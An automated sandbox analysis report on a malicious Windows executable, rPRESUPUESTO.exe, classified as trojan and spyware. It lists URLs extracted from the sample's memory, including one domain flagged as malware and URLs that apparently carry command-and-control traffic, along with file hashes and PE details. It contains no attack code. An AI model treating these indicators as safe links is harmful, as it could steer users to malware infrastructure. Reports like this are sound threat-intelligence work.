                                              https://customer.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-114x114.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-180x180.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://active24.cz/objednavka/domain/availability/listktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/font/active24-icons.eotktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/o-spolecnosti/mediaktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://faq.active24.com/cz/085122-Hosting-a-Serveryktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/font/active24-icons.woffktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/o-spolecnosti/kontaktyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/weby/mojestrankyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-favicon-96x96.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-76x76.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003CEE000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/jak-na-tvorbu-webuktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerPRESUPUESTO.exe, 00000000.00000002.2154526498.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.genesiestudios.onlineMqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4590404042.00000000055B8000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://www.active24.com/o-spolecnosti/rikaji-o-nas-zakazniciktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-60x60.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/o-spolecnosti/karieraktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/default-domain/dnssec.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%adktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-120x120.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/font/active24-icons.svgktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/webmail_ikony_vlajky.png)MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/o-spolecnostiktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-ms-icon-144x144.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://faq.active24.com/cz/932337-Spolupr%c3%a1cektmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://faq.active24.com/cz/939671-Fakturace-a-platbyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/dnssecktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/font/active24-icons.ttfktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/klientska-zona/zakaznicka-podporaktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://faq.active24.com/cz/757409-Bezpe%c4%8dnostktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/default-domain/dns.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://blog.active24.cz//ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzhktmutil.exe, 00000009.00000002.4589157081.000000000467A000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.000000000465A000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.ecosia.org/newtab/ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://gui.active24.cz/img/default-domain/superpage.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/0rPRESUPUESTO.exefalse
                                              • URL Reputation: safe
                                              unknown
                                              https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNSktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.active24.com/objednavka/loginktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://webmail.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://gui.active24.cz/img/default-domain/image.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://mysql.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/css/landing.cssktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-144x144.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/default-domain/redirect.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://gui.active24.cz/img/default-domain/notify.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465409
Start date and time: 2024-07-01 16:14:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rPRESUPUESTO.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@16/14
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 117
                                              • Number of non-executed functions: 295
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, ocsp.usertrust.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, crl.usertrust.com, ocsp.comodoca.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target MqDMLUHvZmSMqiwTfIsHo.exe, PID 5908 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: rPRESUPUESTO.exe
Time | Type | Description
10:15:11 | API Interceptor | 38x Sleep call for process: rPRESUPUESTO.exe modified
10:15:16 | API Interceptor | 15x Sleep call for process: powershell.exe modified
10:16:10 | API Interceptor | 11591734x Sleep call for process: ktmutil.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Process: C:\Users\user\Desktop\rPRESUPUESTO.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1500
Entropy (8bit): 5.345358309061185
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHQ
MD5: 215B3562F83C4FB9BBB129D2F9E59ADA
SHA1: 0534A53F6F42ECA7E56EB02E328A2025254AC511
SHA-256: 4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
SHA-512: E09A97CE89258E1BCDA4832E1348720EBCD462E0C81736CCAD8D99AB1AC60ECBAF5E1F552C4F0977F498D25E27739197D2A9C1EFFDEB7116020D106231EB7C43
Malicious: true
Reputation: moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.379736180876081
Encrypted: false
SSDEEP: 48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:tLHyIFKL3IZ2KRH9Ouggs
MD5: E4532FAC52FB479867BAF60958F8E50C
SHA1: 6736C4FA0AFCE32F8E206C7F414A902A96A45E5B
SHA-256: E1475E82065BB6BAD4E6C71F033E48B8DEEB85FACB251FC1D098E4D22AB6F7FB
SHA-512: 506DC2488F6E6824D763CE955B276705DC4BD0218024A6C03FF369B1221484F4E0CA09062432D1C0017704F2EC5276AEFD0DFB4F8D3AFDE6750BBBEED4B4B48A
Malicious: false
Reputation: low
Process: C:\Windows\SysWOW64\ktmutil.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.908948155144851
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:rPRESUPUESTO.exe
                                              File size:713'736 bytes
                                              MD5:e78d43a26913cf101b98d1d04839eee2
                                              SHA1:911c8c10f7c8bc9fd3c6bd16e9f5da11e3c3eb5d
                                              SHA256:8f9dbdd77e130b7238761966a9c9aa8712baf2100ddebc3d9d206ee17f8f119c
                                              SHA512:bffe8fb15a48272c7de1893a75e0f8bacc8ef635395639b10e64bfc41fbd5d8dd63f43c0f85302a1823251b3fb2e1e9edbdd34f624ed0f683c2adbfe328b7811
                                              SSDEEP:12288:s99glhLQbCawDK1ko+anBlfU4JqOIxTXZ9cmJ1oleOZLitjmJhSGZ3jVfkUnkR:sOiw+1DLnjfdIJ9cqZtKRy
                                              TLSH:B1E41245A3FCAB16F6B697F138B1401003BC35666660D34C1ECA64CF26A7F956B30B6B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................
                                              Icon Hash:00928e8e8686b000
                                              Entrypoint:0x4ac21e
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
